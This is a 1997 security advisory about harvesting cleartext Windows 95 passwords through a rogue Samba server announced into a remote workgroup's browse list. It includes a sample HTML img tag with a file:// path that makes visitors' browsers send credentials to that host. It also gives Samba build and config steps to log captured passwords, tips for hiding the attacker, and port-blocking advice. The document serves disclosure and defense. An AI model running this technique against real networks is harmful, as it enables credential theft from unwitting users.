SMB Attacks on Windows 95
VERSIONS AFFECTED
Windows 95, with and without Internet Explorer.
DESCRIPTION
Apparently a new problem has been discovered that allows a malicious Web developer to snag a Windows 95 password in cleartext, given only the IP address and Workgroup name. The action could be done in such a way that it leaves no noticeable trace what-so-ever, which makes it incredibly dangerous indeed.
A Master Browser can be indirectly used as a tool against the machines it serves by introducing a hostile host in to the browse list. This exploit requires the use of a SAMBA server, which is a Unix based rendition of an SMB compatible server.
Samba servers are capable of announcing themselves to a remote network (workgroup) on a different subnet, given the workgroup name. An intruder may use this technique in two ways to gain access to a username and password. They could introduce a share from the system they place in the browse list, and wait for a user to make an attempt at accessing it - at which point the username and password are transmitted. They could also embed the file:// tag into a Web page and wait for a user to arrive at that page - at which point the Web browser would initiate a connection to the remote server named in the file:// tag, and promptly transmit the username and password. Sample HTML tag:
<img
src=file://\\testsystem/testshare/testfile.gif>
TESTING
* Compile Samba using -DDEBUG_PASSWORD
* Employ the remote announce option in the smb.cfg file, specifying the remote host or broadcast address, and workgroup name of the network you wish to test. Sample:
workgroup = TEST preferred master = yes domain master = yes security = user debug level = 100 remote announce = 10.0.0.255/WORKGROUP_NAME
* Establish a share on the Samba server. Sample:
[testt] path = /tmp public = no browsable = yes
* If you wish, place one or more files in the directory, then start the smbd daemon. At this point, any SMB related traffic (e.g. browsing the local machine) will cause the Samba server to announce itself to the remote network specified. If the remote network is succesfully contacted, the Samba server may be added to that network's browse list.
Later, checking the Samba log will reveal any information it has collected about usernames and passwords. Entries will look similar to this:
checking user=[username] pass=[password]
DEFENSE
Even though you need to have the remote network's workgroup name previous to this type of attack, keep in mind that this name could be easily obtained using the Windows nbtstat command.
Also take note that it is VERY easy for a perpetrator to completely hide themselves during this attack by making a few minor adjustments to their hostname and /etc/hosts file. In otherwords, this could be done in an untraceable fashion in certain instances.
To stop this type of attack from outside your network (Internet), block access to inbound traffic destined for ports 137, 138, and 139 on your network. This does not solve problems with this type of attack coming from inside your network.
Microsoft was informed of this problem on March 17, 1997. Watch this page for more information.
Credits
Discovered by Steve
Birnbaum with help from Mark
Gazit.
Additional support from Yacov
Drori and Roman
Lasker.
Thanks to hobbit for
his paper on CIFS,
Thanks also to BioH
for helping to test this, and anyone else who helped or provided
ideas.
Posted here at The NT Shop March 17, 1997 - 10:40pm
0101-